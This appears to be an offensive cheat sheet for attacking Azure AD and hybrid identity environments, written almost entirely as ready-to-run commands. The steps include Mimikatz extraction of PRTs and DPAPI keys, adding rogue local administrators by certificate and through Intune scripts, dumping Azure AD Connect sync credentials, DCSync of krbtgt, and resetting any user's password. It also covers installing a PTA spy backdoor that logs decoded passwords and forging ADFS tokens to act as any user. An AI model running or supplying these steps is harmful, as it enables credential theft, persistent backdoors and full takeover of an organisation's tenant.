Azure AD machine --> Azure (or another Azure AD Machine)
To go from Azure AD machine to other Azure AD machine if the user has administrative access to other machines.
Check if machine is Azure AD Joined
Check for IsDeviceJoined : YES
Extract PRT, Session key (keyvalue) and Tenant ID
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap" ""exit"'
Extract context key, clearkey and derived key
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue:<keyvalue> /unprotect" "exit"'
Request a certificate from PRT
& 'C:\Program Files\Python39\python.exe' RequestCert.py --tenantId <TENANT ID> --prt <PRT VALUE> --userName <USERNAME> --hexCtx <CONTEXT KEY VALUE> --hexDerivedKey <DERIVED KEY VALUE>
Use certificate to add a user with administrative privileges
python \AzureADJoinedMachinePTC\Main.py --usercert <PATH TO .pfx FILE> --certpass AzureADCert --remoteip <TARGET IP> --command "cmd.exe /c net user <USERNAME> <PASSWORD> /add /Y && net localgroup administrators <USERNAME> /add"
Use psremoting to access the machine
Extract PRT, Session key (keyvalue) and Tenant ID
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap" ""exit"'
Extract context key, clearkey and derived key
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue:<KEY VALUE> /unprotect" "exit"'
Request access token (cookie) to all applications
Import-Module .\AADInternals.psd1
$tempPRT = '<PRT>'
while($tempPRT.Length % 4) {$tempPRT += "="}
$PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($tempPRT))
$ClearKey = "<CLEARKEY>"
$SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce
Copy the value from above command and use it with a web browser
a user with Global Administrator or Intune Administrator role can execute PowerShell scripts on an enrolled Windows device. The script runs with privileges of SYSTEM on the device.
If user had Intune Administrator role go to https://endpoint.microsoft.com/#home and login (or from a ticket (PRT)
Go to Devices -> All Devices to check devices enrolled to Intune:
Go to Scripts and Click on Add for Windows 10. Create a new script and select a script
Example script adduser.ps1
$passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
New-LocalUser -Name <USERNAME> -Password $passwd
Add-LocalGroupMember -Group Administrators -Member <USERNAME>
Select Run script in 64 bit PowerShell Host
On the assignment page select "Add all users" and "add all devices"
The application behind the proxy may have vulnerabilities to access the on-prem environment.
Enumerate application which has a application proxy configured
Import-Module .\AzureAD.psd1
Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}
Get the Service Principal (use the application name)
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "<APPLICATION NAME>"}
Find user and groups assigned to the application
. .\Get-ApplicationProxyAssignedUsersAndGroups.ps1
Get-ApplicationProxyAssignedUsersAndGroups -ObjectId <OBJECT ID OF SERVICE PRINCIPAL>
Extract secrets of service account
After compromising the application
Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'
Check if there is an account name with MSOL_<INSTALLATION ID>
. This user has DCSYNC rights. (or AAD_
if installed on a DC)
Command to check if AD connect is installed on the server Get-ADSyncConnector
Account with SYNC_
is created in Azure AD and can reset any users password in Azure AD.
Passwords for both the accounts are stored in SQL server on the server where Azure AD Connect is installed and it is possible to extract them in clear-text if you have admin privileges on the server.
Enumerate server where Azure AD is installed (on prem command)
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
Enumerate server where Azure AD is installed (Azure command)
Import-Module .\AzureAD.psd1
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}
Extract credentials from the server
Import-Module .\AADInternals.psd1
Get-AADIntSyncCredentials
Run DCSync with creds of MSOL_* account
runas /netonly /user:<DOMAIN>\MSOL_<ID> cmd
Invoke-Mimikatz -Command '"lsadump::dcsync/user:<DOMAIN>\krbtgt /domain:<DOMAIN> /dc:<DC NAME>"'
Reset password of any user
Using the Sync_* account we can reset password for any user. (Including Global Administrator and the user who created the tenant)
Using the creds, request an access token for AADGraph and save it to cache using the SYNC account.
Import-Module .\AADInternals.psd1
$passwd = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<SYNC USERNAME>", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds -SaveToCache
Get-AADIntUser -UserPrincipalName <NAME> | select ImmutableId
Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE ID>" -Password "<PASSWORD>" -Verbose
Reset password for cloud only user
Need CloudAnchor ID which is the format <USER>_<OBJECTID>
Import-Module .\AADInternals.psd1
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID
Set-AADIntUserPassword -CloudAnchor "<ID>" -Password "<PASSWORD>" -Verbose
Access Azure portal using the new password.
Pass Through Authentication PTA Abuse
Once we have admin access to an Azure AD connect server running PTA agent.
Not reliable method to check if PTA is used, Check if module is available Get-Command -Module PassthroughAuthPSModule
Once the backdoor is installed, we can authenticate as any user synced from on-prem without knowing the correct password!
Install a backdoor (needs to be run ad administrator)
Import-Module .\AADInternals.psd1
Install-AADIntPTASpy
See passwords of on-prem users authenticating
Get-AADIntPTASpyLog -DecodePasswords
After getting Global Administrator privileges by setting it on a attacker controled machine.
Import-Module .\AADInternals.psd1
Install-AADIntPTASpy
[System.Convert]::ToBase64String((Get-ADUser -Identity onpremuser | select -ExpandProperty ObjectGUID).tobytearray())
On ADFS server (As administrator)
Get-AdfsProperties | select identifier
Check the IssuerURI from Azure AD too (Use MSOL module and need GA privs)
Get-MsolDomainFederationSettings -DomainName <DOMAIN> | select IssuerUri
Extract the ADFS token signing certificate
With DA privileges on-prem
Import-Module .\AADInternals.psd1
Export-AADIntADFSSigningCertificate
Access cloud apps as any user
Open-AADIntOffice365Portal -ImmutableID <IMMUTABLE ID> -Issuer <DOMAIN>/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose
With DA privileges on-prem, it is possible to create ImmutableID of cloud only users!
Create a realistic ImmutableID
[System.Convert]::ToBase64String((New-Guid).tobytearray())
Export the token signing certificate
Import-Module .\AADInternals.psd1
Export-AADIntADFSSigningCertificate
Use the below command from AADInternals to access cloud apps as the user whose immutableID is specified
Open-AADIntOffice365Portal -ImmutableID <IMMUTABLE ID> -Issuer <DOMAIN>/adfs/services/trust -PfxFileName <PATH TO .pfx FILE> -Verbose